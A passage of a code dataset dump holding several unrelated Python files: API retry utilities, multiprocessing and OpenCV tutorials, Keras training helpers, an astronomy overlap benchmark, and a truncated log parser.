user_agent.strip()})\n max_retries = AggressiveRetry(max_retries, backoff_factor=.75,\n status_forcelist=civis.civis.RETRY_CODES)\n adapter = HTTPAdapter(max_retries=max_retries)\n session.mount(\"https://\", adapter)\n\n return session\n\n\nclass AggressiveRetry(Retry):\n # Subclass Retry so that it retries more things. In particular,\n # always retry API requests with a Retry-After header, regardless\n # of the verb.\n def is_retry(self, method, status_code, has_retry_after=False):\n \"\"\" Is this method/status code retryable? (Based on whitelists and control\n variables such as the number of total retries to allow, whether to\n respect the Retry-After header, whether this header is present, and\n whether the returned status code is on the list of status codes to\n be retried upon on the presence of the aforementioned header)\n \"\"\"\n if (self.total and\n self.respect_retry_after_header and\n has_retry_after and\n (status_code in self.RETRY_AFTER_STATUS_CODES)):\n return True\n\n else:\n return super().is_retry(method=method, status_code=status_code,\n has_retry_after=has_retry_after)\n\n\ndef retry(exceptions, retries=5, delay=0.5, backoff=2):\n \"\"\"\n Retry decorator\n\n Parameters\n ----------\n exceptions: Exception\n exceptions to trigger retry\n retries: int, optional\n number of retries to perform\n delay: float, optional\n delay before next retry\n backoff: int, optional\n factor used to increase delay after each retry\n\n Returns\n -------\n retry decorator\n\n Raises\n ------\n exception raised by decorator function\n \"\"\"\n def deco_retry(f):\n def f_retry(*args, **kwargs):\n n_failed = 0\n new_delay = delay\n while True:\n try:\n return f(*args, **kwargs)\n except exceptions as exc:\n if n_failed < retries:\n n_failed += 1\n msg = \"%s, Retrying in %d seconds...\" % \\\n (str(exc), new_delay)\n log.debug(msg)\n time.sleep(new_delay)\n new_delay *= backoff\n else:\n raise exc\n\n return f_retry\n\n return deco_retry\n\n\nclass BufferedPartialReader(object):\n def __init__(self, buf, max_bytes):\n self.buf = buf\n self.max_bytes = max_bytes\n self.bytes_read = 0\n self.len = max_bytes\n\n def read(self, size=-1):\n if self.bytes_read >= self.max_bytes:\n return b''\n bytes_left = self.max_bytes - self.bytes_read\n if size < 0:\n bytes_to_read = bytes_left\n else:\n bytes_to_read = min(size, bytes_left)\n data = self.buf.read(bytes_to_read)\n self.bytes_read += len(data)\n return data\n","sub_path":"civis/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"254945983","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/1/25 20:24\n# @Author : xxx\n# @Email : xxx@admin.com\n# @File : 14.进程池.py\n# @Software: PyCharm\n\n# 四台机器\n# 10000个螺丝钉的任务\n# 人的工作 :把原料扔机器里\n\n# 如果我们有多少个任务 就开启多少个进程 实际上对我们来说 是不划算的\n# 由于我们计算机的cpu个数是非常有限的\n# 所以我们起的进程数量是完全和CPU个数成比例的\nimport os\nimport time\nfrom multiprocessing import Pool,Process\n\ndef func(i):\n print(i,os.getpid())\n\nif __name__ == '__main__':\n start = time.time()\n p_lst = []\n for i in range(100):\n p = Process(target=func,args = (i,))\n p.start()\n p_lst.append(p)\n for p in p_lst:\n p.join()\n end = time.time()\n pro_time = end-start\n start = time.time()\n p = Pool(4)\n for i in range(100):\n p.apply_async(func,args=(i,)) # async异步的提交任务\n p.close() # 关闭池子,不是要回收池子中的进程,而是阻止继续向池子中提交任务\n p.join() # 阻塞,直到池子中的任务都执行完毕\n end = time.time()\n pool_time = end - start\n print(pro_time,pool_time)\n\n\n\n\n\n","sub_path":"day27/15.进程池和多进程的性能测试.py","file_name":"15.进程池和多进程的性能测试.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"126998108","text":"class Order(object):\n def __init__(self, party, action, size, oType, price=None):\n # party: party placing the trade\n # action: BUY or SELL\n # size: quantity of shares specified in order\n # oType: market or limit\n # price: needed for limit orders\n self.party = party\n self.action = action\n self.size = size\n self.type = oType\n self.price = price\n","sub_path":"src/Order.py","file_name":"Order.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125138796","text":"from flask import Flask, render_template\nimport cssutils\n\napp = Flask(__name__)\n\ndef get_css_properties(css_file='static/style.css'):\n with open(css_file, 'r') as css_file:\n css = css_file.read()\n sheet = cssutils.parseString(css)\n return {rule.selectorText: dict(rule.style) for rule in sheet}\n\n\n@app.route('/')\ndef index():\n css_props = get_css_properties()\n return render_template('index.html', css_props=css_props)\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=5005)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"448311232","text":"\"\"\"\nunittest: python unit test functionality\nrnnmb: main method\nromnum_parser: functions which turn roman numerals into numeric values.\nint_parser: function to turn numeric values into roman numerals.\n\"\"\"\nimport unittest as test\n\n# import rnnmb as rn\nimport romnum_parser as rp\nimport int_parser as ip\n\n\nclass TestMethods(test.TestCase):\n \"\"\"\n TestMethods:\n Class containing unit tests for all three other methods in the program.\n \"\"\"\n\n def test_int_parser(self):\n \"\"\"\n test_int_parser():\n Object method used to test int parser output. Tests a few strs against\n expected outputs.\n \"\"\"\n self.assertEqual(ip.int_parser(\"4\"), \"IV\")\n self.assertEqual(ip.int_parser(\"10\"), \"X\")\n self.assertEqual(ip.int_parser(\"28\"), \"XXVIII\")\n self.assertEqual(ip.int_parser(\"49\"), \"XLIX\")\n self.assertEqual(ip.int_parser(\"100\"), \"C\")\n self.assertEqual(ip.int_parser(\"451\"), \"CDLI\")\n print(\"test_int_parser complete\")\n\n def test_intp_guardrails(self):\n \"\"\"\n test_intp_guardrails(self):\n Object method used to ensure the int parser refuses strings.\n \"\"\"\n with self.assertRaises(ValueError):\n ip.int_parser(\"swordfish\")\n print(\"test_intp_guardrails complete\")\n\n def test_intp_outputstr(self):\n \"\"\"\n test_intp_outputstr(self):\n Object method used to ensure the int parser returns well-formed strings.\n \"\"\"\n for i in [ip.int_parser(str(x)) for x in range(1, 10000)]:\n self.assertTrue(i.isupper())\n print(\"test_intp_outputstr complete\")\n\n def test_romnum_parser(self):\n \"\"\"\n test_romnum_parser(self):\n Object method used to verify the parser can correctly evaluate a few test\n strings.\n \"\"\"\n self.assertEqual(rp.romnum_parser(\"IV\"), 4)\n self.assertEqual(rp.romnum_parser(\"X\"), 10)\n self.assertEqual(rp.romnum_parser(\"XXVIII\"), 28)\n self.assertEqual(rp.romnum_parser(\"XLIX\"), 49)\n self.assertEqual(rp.romnum_parser(\"C\"), 100)\n print(\"test_romnum_parser complete\")\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Calls all tests if main.\n \"\"\"\n TEST_OBJ = TestMethods()\n TEST_OBJ.test_int_parser()\n TEST_OBJ.test_intp_guardrails()\n TEST_OBJ.test_intp_outputstr()\n TEST_OBJ.test_romnum_parser()\n","sub_path":"source/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"128815190","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nimg = cv2.imread('pun.jpg',0) \r\nkernel = np.ones((5,5),np.uint8)\r\n\r\nerosion = cv2.erode(img,kernel,iterations = 1)\r\ndilation = cv2.dilate(img,kernel,iterations = 1)\r\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\r\nclosing = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\r\noutline = cv2.morphologyEx(img, cv2.MORPH_GRADIENT, kernel)\r\n\r\nplt.subplot(2,3,1),plt.imshow(img,cmap = 'gray')\r\nplt.title('Original'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(2,3,2),plt.imshow(erosion,cmap = 'gray')\r\nplt.title('Erosion'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(2,3,3),plt.imshow(dilation,cmap = 'gray')\r\nplt.title('Dilation'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(2,3,4),plt.imshow(opening,cmap = 'gray')\r\nplt.title('Opening'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(2,3,5),plt.imshow(closing,cmap = 'gray')\r\nplt.title('Closing'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(2,3,6),plt.imshow(outline,cmap = 'gray')\r\nplt.title('Outline'), plt.xticks([]), plt.yticks([])\r\n\r\nplt.show()\r\n","sub_path":"morphology.py","file_name":"morphology.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"434843498","text":"# -*- coding:utf-8 -*-\n\nfrom numpy import asarray\nimport codecs\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils import to_categorical\nimport re\n\n\ndef load_data(path):\n file = codecs.open(path, 'rb', encoding='utf-8')\n string = file.read()\n data = [[row.strip().split() for row in sample.strip().split('\\n')] for\n sample in\n re.split('\\n\\n', string.strip())]\n file.close()\n for sentense in data:\n i = 0\n for word in sentense:\n # if word[1]=='O'.decode('utf-8') is True:\n if len(word) > 1:\n if word[1] == 'O'.decode('utf-8'):\n i = i + 1\n # print len(sentense)\n if i == len(sentense):\n data.remove(sentense)\n return data\n\n\ndef load_embedding():\n embedding_path = 'wiki.zh.text.traditional.text'\n embedding_index = dict()\n file = open(embedding_path)\n for line in file:\n values = line.decode('utf-8').split()\n word = values[0]\n coefs = asarray(values[1:], dtype='float32')\n embedding_index[word] = coefs\n file.close()\n\n return embedding_index\n\n\ndef word2id(embedding_index):\n word2idx = dict((w, i) for i, w in enumerate(embedding_index.keys()))\n return word2idx\n\n\ndef id2word(embedding_index):\n id2word = dict((i, w) for i, w in enumerate(embedding_index.keys()))\n return id2word\n\n\ndef traindata(train_path, word2idx):\n train_data = load_data(train_path)\n max_train_sentence = max(len(sentence) for sentence in train_data)\n train_x = [[word2idx.get(word[0].lower(), 0) for word in sentence if len(word) > 1] for sentence in train_data]\n train_x = pad_sequences(train_x, max_train_sentence)\n #tags = ['O', 'B-PER', 'I-PER', 'E-PER', 'B-LOC', 'I-LOC', 'E-LOC', 'B-ORG', 'I-ORG', 'E-ORG']\n tags = ['O', 'B-PER', 'I-PER', 'E-PER', 'B-LOC', 'I-LOC', 'E-LOC', 'B-ORG', 'I-ORG', 'E-ORG', 'S-ORG', 'S-PER','S-LOC']\n train_y = [[tags.index(word[1], 0) for word in sentence if len(word) > 1] for sentence in train_data]\n train_y = pad_sequences(train_y, max_train_sentence, value=-1)\n train_y = [to_categorical(i, num_classes=len(tags)) for i in train_y]\n\n return train_x, train_y\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"34189672","text":"import tensorflow as tf\nimport keras\nimport time\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nfrom sklearn.metrics import classification_report,confusion_matrix\nimport seaborn as sns\n\n#trainFcn is a function that retrain a model ten times and return different results concerning the training process\ndef trainFcn(model,name, epoch, datagen, x_train, y_train, x_test, y_test, x_val, y_val, batch_s, test):\n\t#initialize some useful variables\n\tsomme_accuracy, somme_loss, moy_time = 0, 0, 0\n\t#train the model for the first time\n\tn = 1\n\ti=0\n\thistory = [0]*n\n\tstart_time = time.time()\n\t#train the model and save the result in history[i]\n\tif test:\n\t\thistory[i] = model.fit(datagen.flow(x_train,y_train, batch_size = batch_s) ,epochs = epoch , validation_data = datagen.flow(x_val, y_val))\n\telse:\n\t\thistory[i] = model.fit(x_train,y_train, batch_size = batch_s ,epochs = epoch , validation_data = (x_val, y_val))\n\t#initializr the parameters to return later on\n\tbest_history = history[i]\n\tbest_loss = model.evaluate(x_test,y_test)[0]\n\tworst_loss = model.evaluate(x_test,y_test)[0]\n\tbest_accuracy = model.evaluate(x_test,y_test)[1]*100\n\tworst_accuracy = model.evaluate(x_test,y_test)[1]*100\n\t#save the model of the first iteration in case it is the best or the worst\n\tmodel.save(\"worst_model\"+name+\".h5\")\n\tmodel.save(\"best_model\"+name+\".h5\")\n\t#start measuring the avg loss and avg accuracy and time\n\tsomme_loss += best_loss\n\tsomme_accuracy += best_accuracy\n\tmoy_time += time.time() - start_time\n\t#retrain the model for 9 times that rest\n\ti=1\n\twhile (i best_accuracy:\n\t\t\tbest_accuracy = actual_accuracy\n\t\t\tbest_history = history[i]\n\t\t\tmodel.save(\"best_model\"+name+\".h5\")\n\t\t#save the worst model and worst accuracy\n\t\tif actual_accuracy < worst_accuracy:\n\t\t\tworst_accuracy = actual_accuracy\n\t\t\tmodel.save(\"worst_model\"+name+\".h5\")\n\t\t#save the best loss according to the loss measured in line 33\n\t\tif actual_loss < best_loss:\n\t\t\tbest_loss = actual_loss\n\t\t#save the worst loss \n\t\tif actual_loss > worst_loss:\n\t\t\tworst_loss = actual_loss\n\n\t\t#retrain again\n\t\ti+=1\n\t#measure the avg of accuracy, loss and time\n\tmoy_accuracy = somme_accuracy /n\n\tmoy_loss = somme_loss/n\n\tmoy_time /= n\n\t#return the all the results in an array\n\tresult = [moy_accuracy, moy_loss, best_accuracy, worst_accuracy, best_loss, worst_loss, moy_time, best_history]\n\treturn result\n\t\ndef plot_best_validation_loss_accuracy(train_acc, val_acc, epochs, train_loss, val_loss, name):\n\tfig , ax = plt.subplots(1,2)\n\tfig.set_size_inches(20,10)\n\tax[0].plot(epochs , train_acc , 'go-' , label = 'Training Accuracy')\n\tax[0].plot(epochs , val_acc , 'ro-' , label = 'Validation Accuracy')\n\tax[0].set_title('Training & Validation Accuracy')\n\tax[0].legend()\n\tax[0].set_xlabel(\"Epochs\")\n\tax[0].set_ylabel(\"Accuracy\")\n\tax[1].plot(epochs , train_loss , 'g-o' , label = 'Training Loss')\n\tax[1].plot(epochs , val_loss , 'r-o' , label = 'Validation Loss')\n\tax[1].set_title('Training & Validation Loss')\n\tax[1].legend()\n\tax[1].set_xlabel(\"Epochs\")\n\tax[1].set_ylabel(\"Loss\")\n\tplot_name = 'validation_loss'+name\n\tplt.savefig('{}.png'.format(plot_name))\n\ndef plot_muliplt_line_chart(plt, name, legend_names):\n\tplt.title('model accuracy')\n\tplt.ylabel('accuracy')\n\tplt.xlabel('epoch')\n\tplt.legend(legend_names, loc='upper left')\n\tplt.gca().set_ylim([0,1])\n\tplt.savefig('{}.png'.format(name))\n\t\ndef plot_confusion_matrix(y_test, predictions, name):\n\tcm = confusion_matrix(y_test,predictions)\n\tcm = pd.DataFrame(cm , index = ['0','1'] , columns = ['0','1'])\n\tplt.figure(figsize = (10,10))\n\tlabels = ['PNEUMONIA', 'NORMAL']\n\tsns.heatmap(cm,cmap= \"Accent\", linecolor = 'black' , linewidth = 1 , annot = True, fmt='',xticklabels = labels,yticklabels = labels)\n\t#save the confusion matrix\n\tplt.savefig('{}.png'.format(name))\n ","sub_path":"script/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"4041496","text":"#! /usr/bin/env python\n\n\"\"\"\n A test program completely separate from main chronostar for astr3005,\n in order to test out the performance of swig and suitability of\n the code to find overlap in a simple test.\n\"\"\"\n\nimport sys\nsys.path.insert(0,'..')\nimport time\nimport argparse\n\nif sys.version[0] == '2':\n timer = time.clock\nelif sys.version[0] == '3':\n timer = time.perf_counter\n\nimport numpy as np\nimport chronostar._overlap as overlap\n\ndef compute_overlap(A,a,A_det,B,b,B_det):\n \"\"\"Compute the overlap integral between a star and group mean + covariance matrix\n in six dimensions, including some temporary variables for speed and to match the \n notes.\n \n This is the first function to be converted to a C program in order to speed up.\"\"\"\n #Preliminaries - add matrices together. This might make code more readable? \n #Or might not.\n ApB = A + B\n AapBb = np.dot(A,a) + np.dot(B,b)\n \n #Compute determinants.\n ApB_det = np.linalg.det(ApB)\n \n #Error checking (not needed in C once shown to work?) This shouldn't ever happen, as \n #the determinants of the sum of positive definite matrices is\n #greater than the sum of their determinants \n if (ApB_det < 0) | (B_det<0):\n return -np.inf\n \n #Solve for c\n c = np.linalg.solve(ApB, AapBb)\n \n #Compute the overlap formula.\n overlap = np.exp(-0.5*(np.dot(b-c,np.dot(B,b-c)) + \\\n np.dot(a-c,np.dot(A,a-c)) )) \n overlap *= np.sqrt(B_det*A_det/ApB_det)/(2*np.pi)**3.0\n \n return overlap\n\ndef correctness(group_icov, group_mean, group_icov_det, star_icovs,\n star_means, star_icov_dets, nstars):\n \"\"\"\n Displays the result for each function, no differences should\n occur.\n \"\"\"\n \n # Using swig-numpy module with multiple stars per call\n swig_np_ms_ols = overlap.get_overlaps(\n group_icov, group_mean, group_icov_det, star_icovs,\n star_means, star_icov_dets, nstars)\n\n\n # Using swig-numpy module with multiple stars per call and log results\n group_cov = np.linalg.inv(group_icov)\n star_covs = np.zeros(star_icovs.shape)\n for i in range(nstars):\n star_covs[i] = np.linalg.inv(star_icovs[i])\n swig_np_ms_lnols = overlap.get_lnoverlaps(\n group_cov, group_mean, star_covs,\n star_means, nstars\n )\n\n # Compare with various implementations of calculating one star at a time\n for i in range(nstars):\n # Using numpy\n numpy_ols = compute_overlap(\n group_icov, group_mean, group_icov_det,\n star_icovs[i], star_means[i], star_icov_dets[i])\n\n # Using swig module (input passed as python list)\n swig_ols = overlap.get_overlap2(\n group_icov.flatten().tolist(), group_mean.flatten().tolist(),\n group_icov_det, star_icovs[i].flatten().tolist(),\n star_means[i].flatten().tolist(), star_icov_dets[i])\n\n # Using swig module (input passed as numpy arrays)\n swig_np_ols = overlap.get_overlap(\n group_icov, group_mean, group_icov_det, star_icovs[i],\n star_means[i], star_icov_dets[i])\n\n # # Using swig module (input passed as numpy arrays, output in log)\n # swig_np_lnol = overlap.get_lnoverlap(\n # group_icov, group_mean, group_icov_det, star_icovs[i],\n # star_means[i], star_icov_dets[i])\n\n assert np.isclose(numpy_ols, swig_np_ms_ols[i], rtol=1e-8)\n assert np.isclose(numpy_ols, swig_ols, rtol=1e-8)\n assert np.isclose(numpy_ols, swig_np_ols, rtol=1e-8)\n assert np.isclose(numpy_ols, np.exp(swig_np_ms_lnols[i]), rtol=1e-8)\n\n print(\"All implementations return same result to 8 sigfigs\")\n\ndef timings(group_icov, group_mean, group_icov_det,\n star_icovs, star_means, star_icov_dets, batch_size, noverlaps=10000):\n \"\"\"\n Executes each function a fixed number of times, timing for how\n long it takes.\n \"\"\"\n if (noverlaps <= 100000):\n npstart = timer()\n for i in range(noverlaps):\n result = compute_overlap(group_icov, group_mean, group_icov_det,\n star_icovs[0], star_means[0],\n star_icov_dets[0])\n numpy_time = timer() - npstart\n print(\"Numpy: \" + str(timer() - npstart))\n else:\n numpy_time = None\n print(\"Numpy: practically infinity seconds\")\n print(\" -> (approximately 5x 'Swig')\")\n\n swigstart = timer()\n for i in range(noverlaps):\n result = overlap.get_overlap2(group_icov.flatten().tolist(),\n group_mean.flatten().tolist(),\n group_icov_det,\n star_icovs[0].flatten().tolist(),\n star_means[0].flatten().tolist(),\n star_icov_dets[0])\n print(\"Swig: {} s\".format(timer() - swigstart))\n\n swignpstart = timer()\n for i in range(noverlaps):\n result = overlap.get_overlap(group_icov, group_mean, group_icov_det,\n star_icovs[0], star_means[0], star_icov_dets[0])\n end = timer()\n print(\"Swigging numpy: {} s\".format(end - swignpstart))\n\n swignpmultistart = timer()\n for i in range(int(noverlaps/batch_size)):\n result = overlap.get_overlaps(\n group_icov, group_mean, group_icov_det,\n star_icovs, star_means, star_icov_dets, batch_size)\n end = timer()\n\n print(\"Swigging numpy multi: {} s\".format(end - swignpmultistart))\n print(\" -> total module calls: {}\".format(noverlaps/batch_size))\n print(\" -> {} microsec per overlap\".\\\n format((end - swignpmultistart)/noverlaps*1e6))\n print(\" -> {} stars per module call\".format(batch_size))\n\n group_cov = np.linalg.inv(group_icov)\n star_covs = np.linalg.inv(star_icovs)\n\n newswignpmultistart = timer()\n for i in range(int(noverlaps/batch_size)):\n result = overlap.get_lnoverlaps(group_cov, group_mean,\n star_covs, star_means, batch_size)\n end = timer()\n\n print(\"Swigging numpy multi logged: {} s\".format(end - newswignpmultistart))\n print(\" -> total module calls: {}\".format(noverlaps/batch_size))\n print(\" -> {} microsec per overlap\".\\\n format((end - newswignpmultistart)/noverlaps*1e6))\n print(\" -> {} stars per module call\".format(batch_size))\n\n if numpy_time:\n print('Total speed up from basic Numpy is {}'.format(\n numpy_time / (end - newswignpmultistart)\n ))\n\n# ------------- MAIN PROGRAM -----------------------\nif __name__ == '__main__':\n\n print(\"___ Testing swig module ___\")\n #Parsing arguments\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-o', '--over', dest='o', default=10000,\n help='number of overlaps, def: 10000')\n parser.add_argument('-b', '--batch', dest='b', default=10000,\n help='batch size, must be <= and factor of noverlaps, def: 10000')\n args = parser.parse_args()\n\n noverlaps = int(args.o)\n batch_size = int(args.b)\n\n # ensuring batch_size is not greater than noverlaps\n if (batch_size > noverlaps):\n batch_size = noverlaps\n\n # Readjusting batch_size upwards to next best fitting amount\n batch_size = int(noverlaps/(noverlaps/batch_size))\n\n #Hard coding some sample data:\n # 1 group inverse covariance matrix and determinant\n # 1 group mean\n # 2 star inverse covariance matrices and determinants\n # 2 star means\n # n=2: number of stars in sample data\n group_icov = np.array(\n [[ 0.08169095,-0.08676841, 0.01251394, 0., 0., 0. ],\n [-0.08676841, 0.12519631,-0.03667345, 0., 0., 0. ],\n [ 0.01251394,-0.03667345, 0.02503973, 0., 0., 0. ],\n [ 0., 0., 0., 1.72222567, 0., 0. ],\n [ 0., 0., 0., 0., 1.72222567, 0. ],\n [ 0., 0., 0., 0., 0., 1.72222567]] )\n group_icov_det = 9.06167723629e-05\n group_mean = np.array([ -6.574, 66.56, 23.436, -1.327,-11.427, -6.527])\n\n star_icovs = np.array(\n [[[ 241.11814038, -20.73085201, -41.76131545, -20.04020342, 39.23379693,\n 3.56762733],\n [ -20.73085201, 241.94306462, 65.75059643, 67.93158749,-112.38156699,\n -9.01800703],\n [ -41.76131545, 65.75059643, 93.00901268, 16.28943086,-186.48126616,\n -26.35192182],\n [ -20.04020342, 67.93158749, 16.28943086, 271.35148676,-206.47751678,\n 0.59099253],\n [ 39.23379693,-112.38156699,-186.48126616,-206.47751678, 533.12434591,\n 56.54371174],\n [ 3.56762733, -9.01800703, -26.35192182, 0.59099253, 56.54371174,\n 8.7246333 ]],\n\n [[ 3.05924773e+02, -2.14497101e+02, 1.81987150e+02, 2.21167193e+01,\n 2.47836028e+01, -1.23364958e+01],\n [ -2.14497101e+02, 3.91116549e+02, 7.84435767e+01, 1.12111433e+00,\n 3.67626279e+00, 1.26979547e+01],\n [ 1.81987150e+02, 7.84435767e+01, 3.51440781e+02, 3.09116499e-01,\n -1.90331451e+01, -1.68244431e+01],\n [ 2.21167193e+01, 1.12111433e+00, 3.09116499e-01, 3.55043182e+01,\n 1.69515554e+01, -1.72936911e+01],\n [ 2.47836028e+01, 3.67626279e+00, -1.90331451e+01, 1.69515554e+01,\n 4.75919822e+01, 1.21941690e+01],\n [ -1.23364958e+01, 1.26979547e+01, -1.68244431e+01, -1.72936911e+01,\n 1.21941690e+01, 4.71046181e+01]]]\n )\n\n star_icov_dets = [ 1315806412.02, 520928339.853 ]\n\n star_means = np.array(\n [[ -4.76574406, 63.32299927, 39.42994111, -1.31855401,-10.77158563,\n -8.24828843],\n [ 17.58529809,-25.56197368,-20.64041645, -0.86932298, -6.32809279,\n -6.419595 ]] )\n\n nstars = star_icovs.shape[0]\n\n print(\"Testing correctnesss\")\n correctness(group_icov, group_mean, group_icov_det, star_icovs,\n star_means, star_icov_dets, nstars)\n star_icovs = np.tile(star_icovs[0], (batch_size,1,1))\n star_means = np.tile(star_means[0], (batch_size,1))\n star_icov_dets = np.tile(star_icov_dets[0], batch_size)\n\n print(\"Teting timings\")\n print(\"# of overlaps: {}\".format(noverlaps))\n timings(\n group_icov, group_mean, group_icov_det, star_icovs,\n star_means, star_icov_dets, batch_size, noverlaps)\n\n print(\"___ swig module passsing all unit_tests ___\")\n\n","sub_path":"benchmarks/bm_overlap_methods.py","file_name":"bm_overlap_methods.py","file_ext":"py","file_size_in_byte":10579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"199909132","text":"from api import db\n\nclass RiskCalculator(db.Model):\n \"\"\" RiskCalculator Model for storing risk calculator related details \"\"\"\n __tablename__ = \"risk_calculator\"\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n name = db.Column(db.String(255), unique=True, nullable=False)\n created_at = db.Column(db.DateTime, nullable=False)\n updated_at = db.Column(db.DateTime, nullable=False)\n deleted_at = db.Column(db.DateTime, nullable=False) \n\n def __repr__(self):\n return \"\".format(self.name)\n","sub_path":"Allgoo/andbank-service/api/risk_calculator/models/risk_calculator.py","file_name":"risk_calculator.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606593238","text":"#!/usr/bin/env python\n\nimport argparse\n\nimport matplotlib.pyplot as pp\nimport numpy as np\nfrom scipy.interpolate import spline\n\n\ndef plot(x, u):\n # A finer grid\n n = 300\n X = np.linspace(x[0], x[-1], n)\n\n # True function\n y = np.ones(X.shape)\n y[X > 0.5] = 0\n pp.plot(X, y, \"k\", label=\"exact\")\n\n interp = spline(x, u, X, order=3)\n pp.plot(X, interp, \"k--\", lw=2, label=\"numerical\")\n\n pp.legend(loc=\"upper right\", frameon=False)\n\n ax = pp.gca()\n for sp in [\"top\", \"right\"]:\n ax.spines[sp].set_visible(False)\n ax.xaxis.set_ticks_position(\"bottom\")\n ax.yaxis.set_ticks_position(\"left\")\n\n\ndef parseoctavefile(path):\n with open(path, \"r\") as f:\n for l in f:\n if not l.startswith(\"#\"):\n return np.fromstring(l, sep=\" \")\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"xfile\", help=\"Path to x coordinates\")\n parser.add_argument(\"ufile\", help=\"Path to u values\")\n parser.add_argument(\"out\", help=\"Path to output file\")\n\n args = parser.parse_args()\n\n x = parseoctavefile(args.xfile)\n u = parseoctavefile(args.ufile)\n\n plot(x, u)\n\n fig = pp.gcf()\n fig.set_size_inches(5, 5)\n fig.savefig(args.out, frameon=False, dpi=100)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"numerical-methods/presentation/figures/context/octave.py","file_name":"octave.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"305384553","text":"from .requirements import *\r\nfrom .location import Location\r\nfrom locations import *\r\n\r\n\r\nclass DungeonColor:\r\n def __init__(self, options):\r\n entrance = Location(9)\r\n room2 = Location(9).connect(entrance, attack_hookshot_powder)\r\n room2.add(DungeonChest(0x314)) # key\r\n Location(9).add(OwlStatue(0x308), OwlStatue(0x30F)).connect(room2, STONE_BEAK9)\r\n room2_weapon = Location(9).connect(room2, attack_hookshot)\r\n room2_weapon.add(DungeonChest(0x30F)) # compass chest\r\n room2_weapon.add(DungeonChest(0x311)) # stone beak\r\n room2_weapon.add(DroppedKey(0x308))\r\n\r\n Location(9).connect(room2, AND(KEY9, MAGIC_POWDER)).add(DungeonChest(0x302)) # nightmare key after slime mini boss\r\n room3 = Location(9).connect(room2_weapon, KEY9) # After the miniboss\r\n room4 = Location(9).connect(room3, POWER_BRACELET) # need to lift a pot to reveal button\r\n room4.add(DungeonChest(0x306)) # map\r\n room4.add(DroppedKey(0x307))\r\n Location(9).add(OwlStatue(0x30A)).connect(room4, STONE_BEAK9)\r\n room5 = Location(9).connect(room4, KEY9) # before the boss\r\n boss = Location(9).connect(room5, AND(NIGHTMARE_KEY9, attack_no_bomb))\r\n boss.add(TunicFairy(0), TunicFairy(1))\r\n\r\n self.entrance = entrance\r\n","sub_path":"logic/dungeonColor.py","file_name":"dungeonColor.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"157129508","text":"import numpy as np\n\n\n# declare\nfs = 44100\nr = 1.5\ntheta = 0.3\nn = 2\nm = 3\nt = np.arange(0, 1, 1 / fs)\nx = np.array(r * np.cos(2 * np.pi * n * t - theta))\n\n# calc about a,b\na = 2 / fs * np.sum(x * np.cos(2 * np.pi * m * t))\nb = 2 / fs * np.sum(x * np.sin(2 * np.pi * m * t))\n\n# output\nprint(f\"a:{a}\")\nprint(f\"b:{b}\")\n","sub_path":"knishida/chapter03/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"605239346","text":"\"\"\"\nParses log files created by Tumbling Dice's Rana .\n\"\"\"\nimport argparse\nimport re\nfrom datetime import datetime as dt\nfrom itertools import islice\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom motion_event import MotionEvent\nfrom parse_eval import get_workbook\nfrom utils import motion_events_to_dataframe, get_match_dataframe, comp_perc\n\nEXCEL_PATH = \"/Users/u6000791/Box/Conservation/Rare Plants/Research Projects/Penstemon 2018-2019/DATA/Rana \" \\\n \"Log/DATA_Rana Penstemon 2018_abu.xlsx\"\nSHEET_NAME = \"Visitors - Nova 1\"\n\nplt.style.use('ggplot')\n\n\ndef check_video(line):\n \"\"\"\n Check if the line contains a video file extension. If so, extract\n and return the video filename from the line.\n :param line: String of the latest line from the log file.\n :return: String filename representing the video the log file\n relates to.\n \"\"\"\n # Extract the 